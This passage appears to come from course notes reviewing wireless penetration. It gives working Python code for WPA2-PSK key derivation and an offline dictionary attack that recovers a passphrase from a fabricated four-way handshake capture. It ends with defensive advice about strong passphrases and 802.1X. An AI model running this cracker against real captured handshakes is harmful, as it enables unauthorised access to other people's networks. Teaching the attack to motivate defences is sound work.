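To show what the captured four-way handshake actually gives an attacker, the following Python example (added here; it is not code from the slides or from aircrack-ng) implements the WPA2-Personal key derivation from 802.11i: PBKDF2 from passphrase and SSID to the PMK, PRF-512 to the PTK, and the HMAC-SHA1 MIC over EAPOL-Key message 2. It fabricates a handshake capture under a known passphrase, then recovers that passphrase with a dictionary attack that needs no further traffic to the AP. The SSID, MAC addresses, nonces, wordlist and passphrase are all made up, and the EAPOL-Key frame layout is the standard one (MIC at byte offset 81).

```python
import hashlib
import hmac

MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes into the EAPOL-Key body


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the expensive step a cracker must repeat per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF-512 over the public handshake values; bytes 0..15 are the KCK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):                      # 4 x 20 bytes = 80, keep 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_zeroed, version):
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed:
    descriptor version 1 (TKIP) = HMAC-MD5, version 2 (CCMP) = HMAC-SHA1 truncated."""
    if version == 1:
        return hmac.new(kck, eapol_zeroed, hashlib.md5).digest()
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def make_handshake(ssid, ap_mac, sta_mac, anonce, snonce, passphrase):
    """Fabricate message 2 of a WPA2-PSK handshake as airodump-ng would capture it
    (constructed for this example, not a real capture)."""
    key_info = (0x010A).to_bytes(2, "big")  # version 2, pairwise, MIC bit set
    body = (b"\x02" + key_info + bytes(2) + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))   # IV, RSC, ID, MIC, len
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    kck = ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, 2)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol_msg2": eapol}


def crack(hs, wordlist):
    """Offline dictionary attack: PBKDF2 + PRF + one HMAC per candidate, nothing sent to the AP."""
    eapol = hs["eapol_msg2"]
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    version = eapol[6] & 0x07               # low 3 bits of key-info
    for word in wordlist:
        kck = ptk(pmk_from_passphrase(word, hs["ssid"]), hs["ap_mac"], hs["sta_mac"],
                  hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, version), captured_mic):
            return word
    return None


# Constructed sample capture
AP_MAC, STA_MAC = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
WORDLIST = ["password", "corpnet123", "letmein", "Summer2023!", "correct horse battery staple"]
HANDSHAKE = make_handshake("CorpNet", AP_MAC, STA_MAC, ANONCE, SNONCE, "Summer2023!")

if __name__ == "__main__":
    print("recovered passphrase:", crack(HANDSHAKE, WORDLIST))
```

Everything the attack needs (SSID, both MACs, both nonces, the MIC) is in the captured frames; only the passphrase is secret, so the defence is a passphrase outside any wordlist or, better, 802.1X so no PSK exists to derive.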
Penetrating Wireless Networks Review (cont'd)